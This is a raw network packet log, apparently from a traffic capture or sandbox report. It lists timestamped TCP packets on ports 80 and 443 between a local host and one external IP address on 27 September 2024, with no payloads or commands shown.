                                                                                                                      Sep 27, 2024 19:04:06.983887911 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.983983040 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.983992100 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:07.424452066 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:07.424530983 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:07.424684048 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:07.424967051 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:07.424982071 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:16.547688007 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:16.547841072 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:16.848079920 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.067008972 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.458482027 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.684068918 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.684254885 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.684366941 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.913430929 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.913446903 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.913613081 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914048910 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914073944 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.914242983 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914468050 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914478064 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.354218960 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.354347944 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.354971886 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.354979038 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.355130911 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.355142117 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.789371014 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.789422989 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.789578915 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.789838076 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.789851904 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:27.916500092 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:27.916691065 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:28.815085888 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:28.815296888 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.031224012 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.031429052 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.031594038 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.033303022 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.251674891 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.252845049 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.253065109 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253407001 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253428936 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.253587008 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253851891 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253863096 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.702013969 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.702322960 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.702676058 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.702686071 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.703028917 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.703037977 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:30.139929056 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:30.139991999 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:30.140147924 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:30.140198946 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:30.140463114 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:30.140476942 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:39.258879900 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:39.259026051 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.171787977 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.172007084 CEST4982280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.388746977 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:40.389302969 CEST8049822185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:40.389462948 CEST4982280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.389682055 CEST4982280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.606571913 CEST8049822185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:40.607471943 CEST8049822185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:40.607683897 CEST4982280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.607990026 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.608022928 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:40.608223915 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.608473063 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:40.608484983 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:41.048609972 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:41.048875093 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:41.049251080 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:41.049269915 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:41.049396038 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:41.049407005 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:41.484292984 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:41.484378099 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:41.484518051 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:41.484788895 CEST49823443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:41.484806061 CEST44349823185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:50.608210087 CEST8049822185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:50.608414888 CEST4982280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.512924910 CEST4982280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.513303041 CEST4982480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.731843948 CEST8049822185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:51.731869936 CEST8049824185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:51.732156992 CEST4982480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.732355118 CEST4982480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.950006962 CEST8049824185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:51.950937033 CEST8049824185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:51.951124907 CEST4982480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.951395988 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.951517105 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:51.951692104 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.951874971 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:51.951946020 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:52.397510052 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:52.397886992 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:52.398376942 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:52.398428917 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:52.398459911 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:52.398488045 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:52.831139088 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:52.831285000 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:52.831309080 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:52.831453085 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:52.831568956 CEST49825443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:52.831598997 CEST44349825185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:01.960545063 CEST8049824185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:01.960774899 CEST4982480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:02.838435888 CEST4982480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:02.838587046 CEST4982680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.054481983 CEST8049826185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.055246115 CEST4982680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.055321932 CEST4982680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.055939913 CEST8049824185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.271234989 CEST8049826185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.272316933 CEST8049826185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.272566080 CEST4982680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.273113012 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.273211956 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.273425102 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.273767948 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.273834944 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.721148968 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.721447945 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.722369909 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.722421885 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:03.722520113 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:03.722559929 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:04.155827999 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:04.155950069 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:04.156040907 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:04.156220913 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:04.156311989 CEST49827443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:04.156346083 CEST44349827185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:13.281887054 CEST8049826185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:13.282179117 CEST4982680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.164074898 CEST4982680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.164211035 CEST4982880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.380471945 CEST8049826185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:14.382205963 CEST8049828185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:14.382419109 CEST4982880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.382500887 CEST4982880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.600642920 CEST8049828185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:14.600861073 CEST8049828185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:14.601047993 CEST4982880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.601356030 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.601455927 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:14.601653099 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.601823092 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:14.601886988 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:15.053873062 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:15.054059982 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:15.054425001 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:15.054435015 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:15.054578066 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:15.054589033 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:15.494349957 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:15.494623899 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:15.494635105 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:15.494796991 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:15.494978905 CEST49829443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:15.495048046 CEST44349829185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:24.601201057 CEST8049828185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:24.601475954 CEST4982880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.505160093 CEST4982880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.505259037 CEST4983080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.722708941 CEST8049828185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:25.726630926 CEST8049830185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:25.726948023 CEST4983080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.727962971 CEST4983080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.948964119 CEST8049830185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:25.949950933 CEST8049830185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:25.950185061 CEST4983080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.950548887 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.950651884 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:25.950860977 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.951050997 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:25.951107979 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.406150103 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.406357050 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:26.406722069 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:26.406773090 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.406852007 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:26.406903982 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.851555109 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.851752996 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:26.851836920 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.851897001 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.852009058 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:26.852009058 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:26.852071047 CEST44349831185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:26.852093935 CEST49831443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:35.962884903 CEST8049830185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:35.963125944 CEST4983080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:36.861923933 CEST4983080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:36.862025023 CEST4983280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.081711054 CEST8049832185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.081927061 CEST4983280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.082010031 CEST4983280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.083000898 CEST8049830185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.301727057 CEST8049832185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.303551912 CEST8049832185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.303812981 CEST4983280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.304080963 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.304191113 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.304416895 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.304502010 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.304539919 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.756470919 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.756779909 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.757388115 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.757411003 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:37.757493019 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:37.757503033 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:38.215539932 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:38.215732098 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:38.215821028 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:38.215858936 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:38.216034889 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:38.216106892 CEST49833443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:38.216165066 CEST44349833185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:47.312140942 CEST8049832185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:47.312380075 CEST4983280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.220012903 CEST4983280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.220166922 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.441453934 CEST8049832185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:48.441525936 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:48.441828012 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.442399979 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.669414043 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:48.669481039 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:48.669672012 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.670259953 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.670353889 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:48.670583010 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.670871973 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:48.670939922 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.115678072 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.115964890 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.116404057 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.116421938 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.116466999 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.116480112 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.563513994 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.563714981 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.563782930 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.563926935 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.564022064 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.564083099 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:58.679290056 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:58.679620981 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.575372934 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.575521946 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.791135073 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:59.791949987 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:59.792130947 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.792244911 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.008724928 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.009735107 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.010143042 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010351896 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010459900 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.010670900 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010869980 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010936022 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.457030058 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.457236052 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.457493067 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.457528114 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.457758904 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.457801104 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.892707109 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.892941952 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.893038988 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.893089056 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.893260002 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.893335104 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.893393993 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:10.019995928 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:10.020132065 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:10.901071072 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:10.901165962 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.117243052 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.117470980 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.117588043 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.117706060 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.333532095 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.334454060 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.334815979 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335274935 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335365057 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.335588932 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335767031 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335825920 CEST44349839185.86.211.137192.168.11.20
